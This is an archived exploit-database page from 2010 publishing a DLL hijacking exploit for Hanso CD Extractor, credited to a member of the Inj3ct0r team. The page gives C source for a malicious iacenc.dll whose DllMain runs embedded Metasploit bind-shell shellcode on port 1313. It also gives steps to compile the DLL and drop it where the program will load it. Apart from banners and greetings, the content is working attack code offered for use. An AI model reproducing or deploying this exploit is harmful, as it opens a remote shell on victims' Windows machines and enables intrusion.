Home / os / win7

[local exploits] - Hanso CD Extractor DLL Hijacking Exploit

Posted on 20 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Hanso CD Extractor DLL Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Hanso CD Extractor DLL Hijacking Exploit by anT!-Tr0J4n in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================
Hanso CD Extractor DLL Hijacking Exploit
========================================



                         ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /&#039;             __  /&#039;__`        / \__  /&#039;__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /&#039; _ ` / /_/_\_&lt;_  /&#039;___  /    /`&#039;__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               #########################################              1
0               I&#039;m anT!-Tr0J4n member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
#Hanso CD Extractor   DLL Hijacking Exploit ( iacenc.dll )

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com &amp; C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends

#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member

#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :  http://www.hansotools.com/applications/hanso-cd-extractor.html


#Tested on:   Windows XP sp3




==========================
[&gt;&gt;] Compile code as ( iacenc.dll )

[&gt;&gt;] Move DLL file to the directory where Hanso CD Extractor  is installed

[&gt;&gt;] check the result --&gt; 0wn33d


 
==========================


*/
 
#include &lt;windows.h&gt;
#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
&quot;x33xc9xb1x71xd9xccxd9x74x24xf4x5axb8x8bxf0x6b&quot;
&quot;x88x31x42x14x03x42x14x83xeax77x12x9ex51x4bx0a&quot;
&quot;x15x46xa7x13x2exc4x17x2dx90xfax5ex1cx44xccx17&quot;
&quot;x46x1axc1x2bx7bx6bx0bxc9xcbx79xf3x02x70xa7x1c&quot;
&quot;x1ax18x5exeax0ex4cx26x6dx61x78x82x18x2ex5cxb0&quot;
&quot;x47x78xb2xc4x13xa2x2bxfax10xe4x75x67xb5x3cx0f&quot;
&quot;xd8xbcxefxaexddxf7x7cx02x82xd9x94x69xf6x52x08&quot;
&quot;xc3xddx4dx9fx38x1fx4cx58x59x99x20xcex33x2bxe6&quot;
&quot;x9ex58x2ax15x3axe7xacx30x0fxd9x19xf0xbcx96xe1&quot;
&quot;xc5xdcxfcxe7x42x6ex35x16x4axf8x16x82x92x75xcd&quot;
&quot;x72xb0x29x9exe4xadxa0x37x18x21xf9x5ax28xcaxc7&quot;
&quot;x9exa3x1dxd5xe7xbexcexb6x58x9ax29xdcx1axbax13&quot;
&quot;x72x13x09x87x4cx1cxf4x9ax33x30x57x38x59x4fx63&quot;
&quot;x4ax8fxdfx2bxc7x3bx4ax2dx22x97x08x8dxf0x36x57&quot;
&quot;x04x14x71x65x45x49xf3x0cx20xaex9dxefxc1xecxe7&quot;
&quot;xcbx29x4fx12x65x23x10xb5xbcx8dxa0xafxc8x72x85&quot;
&quot;x6cx72x2exe8x22x8fx3bx16x40x86x68x80x7dxafxf4&quot;
&quot;xd1xcdxf6x7exd5x29x45xdbx05x92x29xc8xe2xb4x13&quot;
&quot;xfbxebx3bx9ex9cxfex62xacx9dxa1x5cx9bx40x3fx12&quot;
&quot;xc6x92xf6x5cx16xdbx64x62xcdx20x58x5fx69x71x80&quot;
&quot;x11xa4xdex36xf3x73x53x86x07xbax93x68x03x99xaf&quot;
&quot;xf7xd5x91x1fxcbxc3x0ex66x94xdcx5ax69x57xe3x76&quot;
&quot;x21x98x42x03x51x0ex59x36x6fx8dxcax74xfax6ex45&quot;
&quot;x1dx97x67x4bx6fxc2xa6xebxe2x6dxc0x1axe7xaex0b&quot;
&quot;x40xc5xbex68x96xbbx8exe3x0fx6exb4x4ex25x14xe0&quot;
&quot;xd0xa4x5ex63xeaxb6xecx72x47xbbxf2x2dx24xcexa1&quot;
&quot;x5dx4fx3bx15xf7x43x09x8dx49x29xa6x4exf2x38xcc&quot;
&quot;x9cx3fx40x37x0dx9dxe6x85x77xb4x01xf8x66x3fx0a&quot;
&quot;x04x88x79x50xebx51xa7xf6x13x98x88xe5x92x8bx5d&quot;
&quot;xc4x69x69xdbx3ax19x03xf8xf5xdex75x17x75x1dxd3&quot;
&quot;x80x55xd3x72xcbxd5x04x7cx2dxbdxddx09xeex44x57&quot;
&quot;x5ax72x31xacxfbx9bxf9x5fx59xb0xfd&quot;;


BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    int (*func)();
    func = (int (*)()) buf;
    (int)(*func)();

  return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-20]</pre></body></html>

 

TOP

Malware :

Exploits :